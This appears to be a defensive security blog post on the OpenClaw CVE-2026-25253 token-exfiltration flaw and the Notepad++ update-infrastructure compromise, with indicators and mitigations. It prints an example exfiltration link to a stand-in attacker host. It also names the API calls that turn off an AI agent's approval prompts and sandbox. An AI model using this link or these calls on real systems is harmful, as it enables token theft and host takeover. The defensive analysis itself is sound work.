OpenClaw RCE and Notepad++ Supply Chain Attack: 2026 Threats
State-sponsored hackers maintained six-month access to Notepad++ update infrastructure while a critical one-click vulnerability in OpenClaw enabled complete gateway compromise through malicious links. These aren't isolated incidents—they represent a fundamental shift in how adversaries exploit trusted development tools that security professionals depend on daily.
CVE-2026-25253 affects OpenClaw (formerly Clawdbot and Moltbot), enabling attackers to exfiltrate authentication tokens through WebSocket origin validation failures and achieve remote code execution with CVSS score 8.8. Meanwhile, Chinese APT group Lotus Blossom compromised Notepad++ hosting infrastructure from June through December 2025, selectively targeting telecommunications and financial organizations in East Asia. Both attacks exploited infrastructure-level weaknesses rather than application code vulnerabilities.
This analysis examines verified technical details from primary sources including CVE databases, vendor advisories, and incident response reports. You'll understand how these attacks bypass traditional security controls and what immediate actions protect development environments.
The OpenClaw Token Exfiltration Vulnerability
WebSocket Origin Validation Failure
OpenClaw's Control UI accepts gatewayUrl parameters from query strings without validation, automatically initiating WebSocket connections that transmit stored gateway tokens. Security researcher Mav Levin from depthfirst discovered this logic flaw enables cross-site WebSocket hijacking (CSWSH) because the server fails to validate the Origin header in requests.
The attack chain executes in milliseconds. A victim clicking a crafted link like https://victim-ui/?gatewayUrl=wss://attacker.com/exfil triggers automatic token transmission to attacker-controlled servers. The stolen Bearer token grants operator-level access to the victim's local gateway API, enabling arbitrary configuration changes and privileged command execution.
Important: Even localhost-only OpenClaw instances remain vulnerable. The attack uses the victim's browser as a pivot point into the local network, bypassing the need for internet-facing exposure entirely.
Sandbox Escape Through API Manipulation
OpenClaw implements robust safety features including execution approval prompts and containerized sandboxes for dangerous operations. However, the stolen authentication token includes operator.admin and operator.approvals scopes, allowing attackers to disable these protections through API calls rather than exploiting sandbox implementation vulnerabilities.
Attackers send exec.approvals.set requests setting ask: ""off"" to eliminate user confirmation requirements. A subsequent config.patch request changes tools.exec.host to ""gateway"" forcing commands to execute directly on the host machine instead of inside Docker containers. This API-based bypass demonstrates how authentication compromise can render technical security controls irrelevant.
Attack Progression Analysis
| Stage | Technical Action | Attacker Capability | Detection Opportunity |
|---|---|---|---|
| Delivery | Victim clicks malicious link | Token exfiltration initiated | Email/web gateway inspection |
| Capture | WebSocket connection to attacker server | Authentication token stolen | Network traffic monitoring |
| Hijack | Legitimate API connection established | Full gateway API access gained | Anomalous WebSocket origins |
| Disable | Safety features removed via API | Sandbox escape, approval bypass | API call pattern analysis |
| Execute | Arbitrary shell command invocation | Complete host system control | Process behavior monitoring |
Impact Across User Profiles
Users granting OpenClaw ""god mode"" permissions face catastrophic impact. The AI agent holds keys to email, messaging platforms, and unrestricted local computer control. Over 100,000 developers trust OpenClaw with authentication to sensitive services including iMessage, WhatsApp, Slack, and development infrastructure.
Security researcher Peter Steinberger noted the vulnerability affects any deployment where users authenticated to the Control UI. Attackers inherit all permissions granted to the AI agent, including access to API keys, authentication tokens, source code repositories, and cloud infrastructure credentials stored in development environments.
The Notepad++ Infrastructure Compromise
Six-Month Persistence Through Hosting Provider
Chinese state-sponsored threat actors attributed to Lotus Blossom (also tracked as Raspberry Typhoon, Bilbug, Spring Dragon) compromised the shared hosting server for notepad-plus-plus.org beginning June 2025. The attack evolved through three distinct phases as defenders closed initial access vectors.
Phase one exploited an unpatched kernel vulnerability granting root access until September 2, 2025. After kernel patching eliminated server access, attackers maintained stolen credentials for internal services until December 2, 2025. This allowed continued redirection of Notepad++ update traffic to attacker-controlled servers serving malicious manifests.
The hosting provider confirmed attackers specifically searched for the notepad-plus-plus.org domain, suggesting prior knowledge of insufficient update verification controls in older Notepad++ versions. Traffic from targeted users was selectively redirected rather than broadly compromised, making detection significantly more difficult.
Selective Targeting and Custom Backdoors
Rapid7 researchers discovered the campaign deployed Chrysalis, a previously undocumented custom backdoor. Kaspersky identified three different infection chains rotating C2 servers, downloaders, and payloads monthly from July through October 2025. Approximately twelve machines were targeted across specific geographic and organizational profiles.
Confirmed victims included individuals in Vietnam, El Salvador, and Australia, plus organizations in the Philippines (government), El Salvador (financial services), and Vietnam (IT service provider). The targeting pattern focused on telecommunications and financial organizations with interests in East Asia.
Infection Chain Evolution
| Period | C2 Infrastructure | Delivery Mechanism | Target Profile | Payload Type |
|---|---|---|---|---|
| July 2025 | 45.76.155[.]202 | NSIS installer | Taiwan organizations | System reconnaissance |
| Aug-Sep 2025 | Rotating IPs | Custom downloaders | Vietnam IT providers | Chrysalis backdoor |
| Oct 2025 | temp[.]sh uploads | Shell command chains | Financial services | Data exfiltration |
| Nov-Dec 2025 | Maintained credentials | Traffic redirection | Selective targeting | Access preservation |
Supply Chain Attack Methodology
Rather than compromising Notepad++ source code, attackers intercepted update traffic at the infrastructure layer. The legitimate updater (WinGUp) checked for updates at notepad-plus-plus.org/getDownloadUrl.php, which attackers redirected to malicious servers returning tampered update manifests pointing to attacker-controlled executables.
Security researcher Kevin Beaumont noted this attack pattern requires significant resources. Sitting inside the ISP chain to redirect traffic at scale indicates nation-state capabilities. The selective targeting—affecting only specific organizations rather than all Notepad++ users—demonstrates sophisticated operational security prioritizing intelligence collection over broad compromise detection.
Pro Tip: Analyze update traffic patterns in network logs. Legitimate Notepad++ updates come from verified domains with valid code signatures. Any redirects to unexpected IPs or domains downloading executables warrant immediate investigation.
Detection and Remediation Strategies
Immediate OpenClaw Mitigation
Update all OpenClaw instances to version 2026.1.29 or later released January 30, 2026. The patch adds gateway URL confirmation modals eliminating auto-connect behavior that enabled token exfiltration. All versions through 2026.1.24-1 contain the vulnerability and require immediate replacement.
Rotate all gateway authentication tokens after updating. Assume any tokens used while running vulnerable versions may have been exfiltrated. Generate new authToken values for every OpenClaw instance and revoke previously issued tokens.
Run OpenClaw with minimal permissions rather than ""god mode"" configurations. Limit agent access to specific tools and services required for intended functionality. Avoid granting unrestricted shell access, file system permissions, or cloud infrastructure API keys unless absolutely necessary for specific workflows.
Notepad++ Verification and Hardening
Download Notepad++ version 8.9.1 or later directly from the official website and install manually. This version includes WinGUp security enhancements verifying installer certificates and signatures. Version 8.9.2, expected in approximately one month, will enforce mandatory certificate signature verification.
Verify existing Notepad++ installations by comparing file hashes against official sources. Review process histories for suspicious executions of notepad++.exe spawning GUP.exe followed by unexpected update.exe or other unusual processes. Check for outbound connections to IPs outside normal update infrastructure.
Enterprise environments should consider blocking notepad-plus-plus.org at network boundaries or preventing gup.exe from internet access if centralized package management handles updates. Deploy robust monitoring for Notepad++ extension installations and unusual process behavior including shell command execution or external network connections.
Detection Indicators Comparison
| Threat | Network Indicators | Process Indicators | File System Indicators | Timeline |
|---|---|---|---|---|
| OpenClaw CVE-2026-25253 | WebSocket to unexpected origins, bearer tokens in transit | Config mutations, sandbox disables, unusual API calls | Gateway config changes | Milliseconds |
| Notepad++ Supply Chain | Redirects to non-standard update servers, temp[.]sh uploads | notepad++.exe → GUP.exe → update.exe chain | Unsigned or newly-signed executables | Hours to days |
Infrastructure Security Fundamentals
Both attacks succeeded through infrastructure-level compromise rather than application code vulnerabilities. The OpenClaw flaw existed in the Control UI's request handling logic. The Notepad++ breach occurred at the hosting provider level through shared server vulnerabilities and credential theft.
Implement defense-in-depth strategies assuming any single layer may fail. Code signing alone didn't prevent the Notepad++ attack because manifest manipulation occurred before signature validation. Network security controls complement application-level protections when perimeter defenses are bypassed.
Monitor authentication token usage patterns for anomalies. Multiple sessions from single credentials within short timeframes indicate potential exfiltration and unauthorized reuse. Implement token rotation policies limiting credential lifespan and enforcing periodic regeneration regardless of suspected compromise.
Broader Supply Chain Security Implications
Shared Hosting as Single Point of Failure
The Notepad++ incident validates concerns about shared hosting infrastructure for critical software distribution. One compromised server affected update integrity for millions of global users. Organizations distributing software through shared hosting require additional validation layers beyond standard code signing.
Notepad++ migrated to a new hosting provider with significantly stronger security practices following the incident. However, the six-month compromise period demonstrates detection challenges when attackers maintain operational security discipline. No indicators of compromise were found in 400GB of server logs analyzed during incident response.
Deploy independent verification mechanisms for all software updates. Hash checking against multiple independent sources catches manifest manipulation. Monitor update traffic for redirects to unexpected domains or IP addresses. Consider dedicated infrastructure for security-critical application distribution eliminating shared hosting risks.
The Evolution of Nation-State Tactics
Lotus Blossom's Notepad++ campaign demonstrates sophisticated persistence tactics characteristic of state-sponsored operations. Rather than smash-and-grab data theft, the six-month operation maintained long-term access through infrastructure compromise, credential persistence, and selective targeting avoiding widespread detection.
Monthly rotation of C2 servers, downloaders, and payloads shows adaptive adversary behavior responding to defensive measures. The deployment of custom backdoors like Chrysalis indicates significant development resources dedicated to this specific campaign.
How should organizations defend against adversaries willing to invest six months maintaining selective access to trusted software distribution channels? Traditional annual penetration testing misses persistent access established months earlier. Continuous validation of trust relationships, code integrity, and infrastructure security becomes essential.
Key Takeaways
- Update OpenClaw to version 2026.1.29 immediately and rotate all authentication tokens to remediate CVE-2026-25253 enabling one-click remote code execution through WebSocket hijacking
- Download Notepad++ version 8.9.1 or later manually from official sources and verify installation integrity through hash comparison against multiple independent sources
- Implement network monitoring detecting WebSocket connections to unexpected origins and software update traffic redirects indicating infrastructure-level compromise attempts
- Run AI agents and development tools with minimal permissions rather than unrestricted access, limiting blast radius when authentication tokens are exfiltrated
- Migrate critical software distribution away from shared hosting infrastructure and deploy independent verification mechanisms beyond code signing alone
- Establish continuous validation frameworks replacing annual assessments, as sophisticated adversaries maintain six-month persistence through infrastructure compromise and credential theft
Conclusion
The OpenClaw vulnerability and Notepad++ supply chain attack demonstrate how adversaries increasingly target development tool infrastructure and authentication mechanisms. CVE-2026-25253's one-click exploitation through token exfiltration and Lotus Blossom's six-month persistence through hosting provider compromise reveal security gaps in software developers rely on daily.
Patch known vulnerabilities immediately. Update OpenClaw and Notepad++ installations before attackers exploit remaining exposure windows. Implement verification layers catching infrastructure manipulation that code signing alone misses. Deploy monitoring detecting behavioral indicators when technical controls fail.
The attacks succeeded because traditional security models assume code vulnerabilities represent primary risk. Modern threats target infrastructure hosting software distribution, authentication token theft, and selective traffic interception. Organizations must implement defense-in-depth strategies assuming compromise and limiting blast radius when initial defenses fail. Start with immediate patching protecting against verified threats, then build frameworks preventing next-generation attack vectors.
Frequently Asked Questions
Q: How do I verify my OpenClaw installation isn't compromised by CVE-2026-25253?
A: Check your version through the admin console—any version before 2026.1.29 released January 30, 2026 contains the WebSocket origin validation vulnerability. After updating, review gateway logs for unusual WebSocket connections from unexpected origins and regenerate all authentication tokens. Analyze API call patterns for suspicious configuration changes disabling sandbox or approval settings.
Q: Can traditional antivirus detect the Notepad++ supply chain attack payloads?
A: Signature-based antivirus likely misses the Chrysalis backdoor since it's previously undocumented custom malware delivered through legitimate update mechanisms with valid initial code signatures. Behavioral detection and endpoint detection and response (EDR) solutions offer better protection by identifying suspicious post-installation activities like unusual process chains (notepad++.exe → GUP.exe → update.exe) and unexpected network connections. Verify installations by comparing file hashes against official Notepad++ sources.
Q: Why does the OpenClaw vulnerability affect localhost-only installations?
A: The attack uses the victim's browser as a pivot point into the local network through cross-site WebSocket hijacking. When the victim clicks a malicious link, their browser initiates the outbound WebSocket connection to the attacker's server, exfiltrating the authentication token. The attacker then uses that stolen token to connect to the victim's localhost OpenClaw instance directly, bypassing the need for the instance itself to be internet-facing.
Q: What makes the Notepad++ attack attribution to Lotus Blossom credible?
A: Multiple independent security researchers including Rapid7 and Kaspersky identified tactics, techniques, and procedures matching Lotus Blossom's historical operations. The deployment of custom backdoors like Chrysalis, selective targeting of telecommunications and financial organizations in East Asia, six-month persistence through infrastructure compromise, and monthly rotation of attack infrastructure all align with known Chinese state-sponsored APT patterns. The hosting provider confirmed attackers specifically searched for the notepad-plus-plus.org domain, suggesting prior intelligence gathering.
Q: Should development teams stop using AI agents like OpenClaw after this vulnerability?
A: The vulnerability has been patched in version 2026.1.29, and OpenClaw remains viable for teams implementing proper security controls. Run agents with minimal necessary permissions rather than ""god mode"" unrestricted access, deploy network monitoring for unusual WebSocket traffic, implement token rotation policies, and educate users about clicking suspicious links in development contexts. The security lesson isn't abandoning useful tools but implementing defense-in-depth strategies assuming any individual control may fail."